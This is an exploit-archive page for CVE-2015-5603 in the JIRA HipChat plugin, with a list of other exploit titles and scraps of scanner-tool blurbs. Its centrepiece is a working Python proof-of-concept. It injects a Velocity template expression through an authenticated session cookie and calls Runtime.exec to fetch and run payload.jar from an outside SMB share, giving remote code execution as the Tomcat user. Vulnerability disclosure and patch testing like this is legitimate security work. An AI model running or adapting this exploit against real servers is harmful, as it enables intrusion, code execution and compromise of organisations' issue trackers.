Menu

Search for hundreds of thousands of exploits

"JIRA and HipChat for JIRA Plugin - Velocity Template Injection"

Author

Exploit author

"Chris Wood"

Platform

Exploit platform

java

Release date

Exploit published date

2015-10-28

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
############################################################################
# JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability
# Date: 2015-08-26
# CVE ID: CVE-2015-5603
# Vendor Link: https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
#
# Product: JIRA and the HipChat for JIRA plugin.
# Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
# Affected JIRA product versions: 6.3.5 <= version <  6.4.11
#
# Discovered internally by Atlassian (vendor)
# Proof of concept script by Chris Wood <chris@invivid.com>
#
# Tested against JIRA 6.3.4a with HipChat 6.29.2 on Windows 7 x64
# Allows any authenticated JIRA user to execute code running as Tomcat identity
############################################################################

import urllib2
import json

# cookie of any authenticated session (ex. jira-user)
JSESSIONID = '541631B0D72EF1C71E932953F4760A70'

# jira server
RHOST      = 'http://192.168.2.15:8080'

# samba public share, read/write to anonymous users
CMD 	   = ' java -jar \\\\192.168.2.234\\public\\payload.jar '
data = {
    'message': ' $i18n.getClass().forName(\'java.lang.Runtime\').getMethod(\'getRuntime\', null).invoke(null, null).exec(\'' + CMD + '\').waitFor() '
}

opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'JSESSIONID=' + JSESSIONID))
urllib2.install_opener(opener)
req = urllib2.Request(RHOST + '/rest/hipchat/integrations/1.0/message/render/')
req.add_header('Content-Type', 'application/json')

response = urllib2.urlopen(req, json.dumps(data))

print('##################################')
print('######### CVE-2015-5603 ##########')
print('##################################')
print(response.read())
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-02 "Apache Flink 1.9.x - File Upload RCE (Unauthenticated)" webapps java bigger.wing
2020-10-29 "WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request" webapps java "Mohammed Althibyani"
2020-10-20 "Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution" webapps java "Jonatas Fil"
2020-10-19 "Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in" webapps java "Daniel Morris"
2020-09-09 "Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)" webapps java V1n1v131r4
2020-09-07 "ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)" webapps java Hodorsec
2020-08-10 "ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)" webapps java "Bhadresh Patel"
2020-07-26 "ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection" webapps java aldorm
2020-07-07 "Exhibitor Web UI 1.7.1 - Remote Code Execution" webapps java "Logan Sanderson"
2020-06-04 "VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution" webapps java "Tomas Melicher"
Release Date Title Type Platform Author
2015-10-28 "JIRA and HipChat for JIRA Plugin - Velocity Template Injection" webapps java "Chris Wood" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected